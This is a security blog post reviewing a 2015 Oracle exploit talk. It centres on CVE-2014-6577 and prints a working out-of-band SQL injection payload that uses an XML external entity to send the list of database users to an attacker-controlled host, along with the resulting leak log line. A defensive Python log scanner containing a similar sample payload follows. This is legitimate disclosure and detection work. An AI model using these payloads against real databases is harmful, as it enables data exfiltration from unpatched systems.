Yesterday I gave my yearly presentation "Best of Oracle Security 2015" at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits I found or modified that were released in 2015 from various sources.
One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting 11.2.0.3, 11.2.0.4, 12.1.0.1 and 12.1.0.2, fixed in the April 2015 CPU). This bug can be used as a helper function in out-of-band SQL injection attacks. Since Oracle 11g, the out-of-band channel via utl_http/httpuritype has been closed by the network ACLs. This exploit reopens that channel in 11g/12c (if the patches are not applied).
—— Out-of-Band SQL Injection Example ——
http://www.oraexploit.com/id=47' or 1=extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.83.1:8080/A='||substr((select sys.stragg(distinct username||'-') as string from all_users),1,220)||'"> %remote; %param1;]>'),'/l')
—
192.168.83.131 - - [18/Nov/2015 00:48:02] "GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0" 404 -
—— Out-of-Band SQL Injection Example ——
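A defender-side check for the request pattern shown above, as an added example that is not part of the original post: it scans web-server access-log lines for an extractvalue(xmltype(...)) call that declares an external parameter entity, handles percent-encoded (including doubly encoded) parameters, and reports the callback host the entity points to. The log lines, client addresses and callback host are constructed samples.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access-log lines (not from the original post). Line 1 carries the
# extractvalue/xmltype XXE pattern with a callback to a TEST-NET address; lines 2-3 are benign.
SAMPLE_LOG = r"""
10.0.0.5 - - [18/Nov/2015 00:47:59] "GET /id=47'%20or%201=extractvalue(xmltype('<?xml%20version=%221.0%22?><!DOCTYPE%20root%20[%20<!ENTITY%20%25%20remote%20SYSTEM%20%22http://192.0.2.10:8080/A='||(select%20user%20from%20dual)||'%22>%20%25remote;]>'),'/l') HTTP/1.0" 200 -
10.0.0.6 - - [18/Nov/2015 00:48:10] "GET /id=47 HTTP/1.0" 200 -
10.0.0.7 - - [18/Nov/2015 00:48:15] "GET /search?q=xmltype%20documentation HTTP/1.0" 200 -
"""

# Common-log-format request line: client, timestamp, method, path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# External (parameter) entity declaration with a SYSTEM identifier pointing at a URL.
ENTITY_RE = re.compile(r'<!entity\s+%?\s*\w+\s+system\s+["\']?(?P<url>[a-z]+://[^"\'>\s]+)', re.I)
# The Oracle-specific sink: extractvalue() fed an xmltype() built from attacker data.
EXTRACTVALUE_RE = re.compile(r'extractvalue\s*\(\s*xmltype\s*\(', re.I)

def decode_path(path, max_rounds=3):
    # Decode percent-encoding repeatedly (bounded) so a doubly encoded payload is still visible.
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def inspect_line(line):
    # Return a finding dict for a suspicious request line, or None if it is benign/unparseable.
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode_path(m.group('path'))
    entity = ENTITY_RE.search(path)
    if not entity:
        return None
    kind = 'oob-sqli-xxe' if EXTRACTVALUE_RE.search(path) else 'xxe'
    return {'client': m.group('ip'), 'time': m.group('ts'), 'kind': kind,
            'callback_host': urlsplit(entity.group('url')).netloc}

def scan_log(text):
    # Scan a whole log and keep only the lines that produced a finding.
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]

if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Reviewing the callback host against egress logs or firewall denies shows whether the database host actually reached out, which is the real indicator that the out-of-band channel is open.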
Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.